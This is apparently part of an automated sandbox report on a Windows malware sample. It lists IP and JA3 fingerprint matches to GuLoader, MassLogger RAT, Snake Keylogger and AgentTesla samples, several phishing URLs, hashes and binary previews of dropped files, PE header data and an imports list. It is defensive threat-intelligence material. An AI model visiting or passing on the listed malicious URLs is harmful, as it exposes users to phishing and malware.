88%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://www.shinsengumiusa.com/mrloskie	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://payhip.com/b/J12iX/purchased	Get hash	malicious	Unknown	Browse	104.17.25.14
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	jG8N6WDJOx.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.16.1
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
ORACLE-BMC-31898US	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	hZbkP3TJBJ.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	9L83v5j083.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	y1jQC8Y6bP.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	FILHKLtCw0.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	m0CZ8H4jfl.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	FPACcnxAUT.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	oEQp0EklDb.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
3b5074b1b5d032e5620f69f9f700ff0e	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	jG8N6WDJOx.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	HGhGAjCVw5.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\lsc5QN46NH.exe
File Type:	data
Category:	dropped
Size (bytes):	201698
Entropy (8bit):	7.985865403736139
Encrypted:	false
SSDEEP:	6144:NY3gz8rRCvpXNI6tsKml/9Du4XaHfQhVhJEmb0jPR:i3KIRWNI4mllDthVEmAj5
MD5:	9C014742DDA3DBC988CC896CC7461670
SHA1:	94AA5CF6FFB9360D6AFBACFF7114F5D13F5D6BB2
SHA-256:	936B2CE0EC2A6111DA046B9CD747719BC93C7C43E0B80670553584BBA502649D
SHA-512:	3ADEFDDCDA0627DAD9932D6491909FA65787D8CC011009EA359E34CD18C4144E2679F442FD2445F26F10C31C253A6C1306EBA3B60CAC2326680274C14C7759AE
Malicious:	false
Reputation:	low
Preview:	EA06..,..D.t...0.Q...W..B..i3jeN.I.......X..)T)...i`...\.X.S=tz_.....&0...P..b...fW!.I-r..~u_.Y....,..$.hDr.i.Ig.K..{L..,fC&._......@.S..}......!..."...M....>.A..!3....a...}4..j.M?@.......):...X$[.....7..6}.....U&..=F.!..@....s...sF..j..WJl.-_...D....U...U.o!..5.M8.c5...Q..:.6.J.........+@....i4...f(.&...)4.@..&..~.:X.W.7..p..4.[..,..{2.E@....R..../..=.P'...GCM..k ...0.P..>.].Q.P..y...8.K...0.a'.,5.P....S..l....j.,eo ..k1......$....i?k..E;..X3....)..)T...-N..."..T..#......{..u.5?..y.LL..Q.V.>...^..1R...m#.x...>.)...?....3..c..Jn..S.bf...;W0.R...5......;...w.....\|...y..P........d...2.Y?.S....2....}..U........'.A..S..'g....T...)3.X.T...gE..)<...#..S.}...[...j..G....`3.--..$..&..U.Z..<..5..r-4......rp.b.q.n!.*...R........_...N#......E,....T\]+...of..M>...`.{]?:-x..e.X..[]..>.....2...Y........_..y....I..}..Qg<.....Y...d....iir..R....g.>4:...r....._D.j.....U..g....aI.qb.Z...:.j...."%..Q..9...........!....X'......G/w.L6......oy..V.!w...;..0

C:\Users\user\AppData\Local\Temp\palladize

Download File

Process:	C:\Users\user\Desktop\lsc5QN46NH.exe
File Type:	data
Category:	dropped
Size (bytes):	207872
Entropy (8bit):	7.8347264690944565
Encrypted:	false
SSDEEP:	3072:96Vy7Ij5jtGkTZjDdCio6AqRVqRusOcDOF/U0pUieO750rB3eQJe0U4ArAObKFsw:+IiLGC7Ch6nUus5w3p/PE3VJe7PM6w
MD5:	1AEB4D9D9B26FDA8D3960A8709A06CED
SHA1:	3DB4DE388302715D528DA6F7329ADC3A0B355448
SHA-256:	485D7ADD3CC1FD5182E94E6EE2CA2990CCCAB7DDFB4746815081277D2CFAE312
SHA-512:	A127A0969412BC3DAE988098ED6D783FB4143B53CBDE00DA9F29930BB7BDDC37B066D34FD48F8364EFC0B84FD9D796DC127C678A8D9D7019CF05BA962DCB0907
Malicious:	false
Reputation:	low
Preview:	...J[1T04FUI..JB.1I6LSQI.JX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB.1I6BL.GK.Q.u.1..h.P#1.A;Y+!0$k)9_:_Df7,uJ?,.X'....i&%<Tz==LqIU8JB71!&.~}8.4t@.N.7.7g.5<.@.HG..7`;.OxA.8.8.FxaYOUG.-cj"4.@.N.e.7xI.<eX*^`".7KJX1T00FUIU8JB71...5QIKJ.tT0\|GQI!.J.71I6LSQI.J{0_19FU.T8J.61I6LS~.KJX!T00.TIU8.B7!I6LQQINJX1T00FPIU8JB71IFOSQMKJ..V02FU.U8ZB7!I6LSAIKZX1T00FEIU8JB71I6LS.\IJ.1T00&WI.3KB71I6LSQIKJX1T00FUIU8JB71..MSMIKJX1T00FUIU8JB71I6LSQIKJX1.=2F.IU8JB71I6LSQ.JJ.0T00FUIU8JB71I6LSQIKJX1T00F{=0@>B71Q.MSQYKJX.U00BUIU8JB71I6LSQIkJXQzBT'!(U8./71I.MSQ'KJX.U00FUIU8JB71I6.SQ.e.9E500F.yU8Jb51I LSQCIJX1T00FUIU8JBw1I.b!";(JX1.;1FU)W8JN61I.NSQIKJX1T00FUI.8J.71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00F

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	0.1843254168738535
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	lsc5QN46NH.exe
File size:	80'740'352 bytes
MD5:	7a6425553456c5f24bb5c8e235574c72
SHA1:	6d825e1a1238c4a4f26966c281507e5e704c5500
SHA256:	6b5bfda5580a6bd8ec3062f4d33b09c0f91722d824e80ae0cb8d47e8b1b2fcb7
SHA512:	1da622c9448297a1b2971dab7415586f9e31e113c8e39404d25ba9937e9b423a2f8d01ce772590a796ad9642c04b66a09f8b044d1b5707e696f686fc61cc6e47
SSDEEP:	24576:uu6J33O0c+JY5UZ+XC0kGso6Fa/ROfRojRhKC8CcXWY:gu0c++OCvkGs9Fa/syHKC8CrY
TLSH:	3A08BE2273DDC360CB669173BF6AB7016EBF3C614630B85B2F980D7DA950161262D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67598DA8 [Wed Dec 11 13:03:36 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FAE34B38D7Ah
jmp 00007FAE34B2BB44h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FAE34B2BCCAh
cmp edi, eax
jc 00007FAE34B2C02Eh
bt dword ptr [004C31FCh], 01h
jnc 00007FAE34B2BCC9h
rep movsb
jmp 00007FAE34B2BFDCh
cmp ecx, 00000080h
jc 00007FAE34B2BE94h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FAE34B2BCD0h
bt dword ptr [004BE324h], 01h
jc 00007FAE34B2C1A0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FAE34B2BE6Dh
test edi, 00000003h
jne 00007FAE34B2BE7Eh
test esi, 00000003h
jne 00007FAE34B2BE5Dh
bt edi, 02h
jnc 00007FAE34B2BCCFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FAE34B2BCD3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FAE34B2BD25h
bt esi, 03h
jnc 00007FAE34B2BD78h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x4a230	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x112000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x4a230	0x4a400	cb4db07a722385fee1bc74e85f5e0044	False	0.9107415298821548	data	7.856758218360419	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x112000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x414f5	data			1.0003401754707317
RT_GROUP_ICON	0x110cb0	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x110d28	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x110d3c	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x110d50	0x14	data	English	Great Britain	1.25
RT_VERSION	0x110d64	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x110e40	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
